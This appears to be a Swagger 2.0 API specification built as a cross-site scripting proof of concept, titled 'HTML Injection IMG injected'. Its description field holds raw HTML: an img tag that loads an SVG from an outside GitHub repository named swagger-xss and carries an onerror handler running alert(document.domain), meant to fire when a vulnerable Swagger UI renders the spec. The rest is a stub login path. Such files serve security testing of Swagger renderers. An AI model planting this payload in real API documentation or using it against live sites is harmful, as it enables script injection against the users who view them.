swagger: '2.0'
info:
  version: 1.0.0
  title: HTML Injection IMG injected
  description: '
        <h1>HTML Injection : IMG injected</h1>
        <img src=//raw.githubusercontent.com/RamanMG/swagger-xss/refs/heads/main/savage.svg onerror=alert(document.domain)>
    '
paths:
  /:
    post:
      responses:
        '200':
          description: Login successful
